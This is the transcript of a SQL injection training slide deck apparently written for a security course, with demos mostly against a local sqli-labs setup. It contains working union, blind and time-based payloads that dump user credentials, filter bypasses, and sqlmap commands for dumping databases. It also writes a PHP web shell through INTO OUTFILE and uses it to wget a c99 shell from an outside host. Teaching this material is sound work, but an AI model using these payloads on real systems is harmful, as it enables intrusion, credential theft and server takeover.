practical approach towards sqli ppt
DESCRIPTION
Sql injection , types of sqli injection , hands onTRANSCRIPT
![Page 1: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/1.jpg)
Sqli Injection
![Page 2: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/2.jpg)
#whoami
Ahamed Saleem @saleem14489#Security Researcher @CDAC
![Page 3: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/3.jpg)
● What is Sql Injection
● Types of sql injection
– Error based Injection ( String, numeric, Union, error )
– Time based Blind SQLi
– Boolean based Blind SQLi
– Cookie based Injection
– Compromising Database server using SQLi (upload a shell)
– Exploitation using SQLmap
– Bypass filters to successfully exploit SQLi .
Agenda
![Page 4: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/4.jpg)
Baa, baa, black hat
Have you any sploits?
Yes, sir, yes, sir
3 bulletproof choices
One for Java
One for IE
One for Chrome
(ha ha ha )
![Page 5: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/5.jpg)
➔ Structured Query Language designed for managing data held in a relational database management systems (RDBMS).
➔ The scope of SQL includes data insert, update and delete, schema creation and modification, and data access control.
What Is Sql ?
![Page 6: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/6.jpg)
Definition Of Sql InjectionDef :
“SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands”
Cause:
It is a flaw in “web application development “ , it is not a DB or web server problem
→ most programmers are still not aware of this problem → lot of solutions posted on the internet are not good
enough
![Page 7: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/7.jpg)
Anatomy Of Sql Injection
Sql Injection
Error Based Blind Based
Boolean Based Time Based
![Page 8: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/8.jpg)
![Page 9: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/9.jpg)
© C-DAC, Hyderabad - 2013
SQL Injection – Illustrated
Firewall
Hardened OS
Web Server
App Server
Firewall
Database s
Legacy Syst em
s
Web S
er vices
Director ies
Hum
an Resr cs
Billing
Custom Code
APPLICATIONATTACK
Netw
ork Layer
Applicat ion L
ayer
Account s
Finance
Adm
inis tration
Transact ions
Com
municat ion
Know
led ge Mgm
t
E-C
omm
erce
Bus. Fun ctionsHTTP
requestSQL
query
DB Table
HTTP response
"SELECT * FROM accounts WHERE
acct=‘’ OR 1=1--’"
1. Application presents a form to the attacker
2. Attacker sends an attack in the form data
3. Application forwards attack to the database in a SQL query
Account Summary
Acct:5424-6066-2134-4334Acct:4128-7574-3921-0192Acct:5424-9383-2039-4029Acct:4128-0004-1234-0293
4. Database runs query containing attack and sends encrypted results back to application
5. Application decrypts data as normal and sends results to the user
Account:
SKU:
Account:
SKU:
![Page 10: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/10.jpg)
OWASP Top 10
![Page 11: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/11.jpg)
Myth
Escaping input Prevents Sql Injection
Sql Injection is an old problem - So I dont have to worry about it
![Page 12: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/12.jpg)
Error Based Injections
Error-based SQL injections are primarily those
in which the SQL server dumps some errors
back to the user via the web application and
this error aids in successful exploitation
![Page 13: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/13.jpg)
A methodological approach is always helpful in understanding the underlying logic. The major process is as follows:
1.Enumerate the application behavior
2.Fuzz the application with bogus data with the goal of crashing the application
3.Try to control the injection point by guessing the query used in the back-end
4. Extract the data from the back end database
Enough theory, time for some action.
Demo
![Page 14: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/14.jpg)
● Id = 1' --+● id=1' AND 1=1 --+● id=1' union select 1,2,3 --+● id=999' union select 1,2,3 --+● id=-1' union select 1,table_name,3 from
information_schema.tables where table_schema=database() --+● id=-1' union select 1,group_concat(table_name),3 from
information_schema.tables where table_schema=database()--+● id=-1' union select 1,group_concat(column_name),3 from
information_schema.columns where table_name='users'--+● id=-1' union select 1,group_concat(username),
group_concat(password) from users --+
![Page 15: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/15.jpg)
Blind Injections
Blind SQL injections are those injections in which the backend database reacts to the input, but somehow the errors are concealed by the web application and not displayed to the end users
Boolean Based :
The information must be inferred from the behavior of the page by asking the server true/false questions
Time Based :
Gain information by observing timing delays in the response of the database
![Page 16: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/16.jpg)
![Page 17: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/17.jpg)
Boolean Based Injections
select ascii(substr(database(),1,1));
id=1' AND (ascii(substr((select database()),3,1))) = 99 --+
id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101 --+
![Page 18: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/18.jpg)
Time based Injections
id=1' and if((select database()="security"), sleep(10),null) --+
id=1' and if ((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1 ) ='e' , sleep(10) , null)--+
![Page 19: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/19.jpg)
Uploading shell
http://localhost/sqli-labs-master/Less-1/?id=-1' union select "","","<?system($_REQUEST['cmd'];?>"
into outfile '/var/www/shell.php' --+
http://localhost/shell.php?cmd=wget http://www.r57shell.net/shell/c99.txt
![Page 20: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/20.jpg)
SqlMap detects and expolits SQLi flaws
Features :● Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server
● Three SQL Injection techniques :● Boolean-based ● Union queries● Batched queries
● Perform an extensive back-end DBMS fingerprint
![Page 21: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/21.jpg)
● Enumerate users, password hashes, privileges, databases, tables, columns and their data-type ● Dump entire or user specified database table entries ● Run custom SQL statements
SqlMap detects and expolits SQLi flaws
![Page 22: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/22.jpg)
Dishum Dishum usingSQLMAP
![Page 23: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/23.jpg)
– First detect the vulnerable URLS – Now use sqlmap :
1 . python sqlmap.py –u http://site.com/?id=1 {Identify sqli is present or not }
2 . python sqlmap.py -u http://site.com/?id=1 --dbs {Discover databases}
3./sqlmap -u http://site.com/?id=1 --tables -D <db name> {table in db}
4./sqlmap -u http://site.com/?id=1 --columns -D <db name> -T <table name>
5./sqlmap -u http://site.com/?id=1 --dump -D <db name> -T <table name>{data}
![Page 24: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/24.jpg)
Uploading Shell Using SQLMap :
1. Check if the current user is DBA or not .
./sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --current-user –is-dba
2.now enter the webserver path
./sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --os-cmd -v 1
3. now the webshell can be loaded using the sqlmap file stager .
DEMO
![Page 25: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/25.jpg)
ByPassing the blacklist Filters
Bypass AND and OR : Id=1' || 1=1 --+ id=1' %26%26 1=1 --+
![Page 26: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/26.jpg)
Hands On
![Page 27: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/27.jpg)
Methodology● Break it
– Try to break the query by fuzzing● Fix it
– Now based on the error try to balance and fix the query
![Page 28: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/28.jpg)
© C-DAC, Hyderabad - 2013
✔ What is Sql Injection✔ Types of Sql Injection✔ Hands on
What did we cover?
![Page 29: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/29.jpg)
© C-DAC, Hyderabad - 2013
* Websites and References
OWASP, WASC, MSDN
* Books and Mailing Lists
Web Application Hackers Handbook, OWASP Guides
* Tools to use
Burp, Paros, Firefox Extensions, Virtual Box, Linux
What did we cover?Further Roadmap
![Page 30: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/30.jpg)
© C-DAC, Hyderabad - 2013
Acknowledge ● @Sqlilabs ● @Google● @Nullhyd● @cswan● @thenounproject
![Page 31: Practical Approach towards SQLi ppt](https://reader035.vdocument.in/reader035/viewer/2022062307/554f42bfb4c90572088b5401/html5/thumbnails/31.jpg)
© C-DAC, Hyderabad - 2013
Thank U
@saleem14489 Facebook.com/ahamedssaleem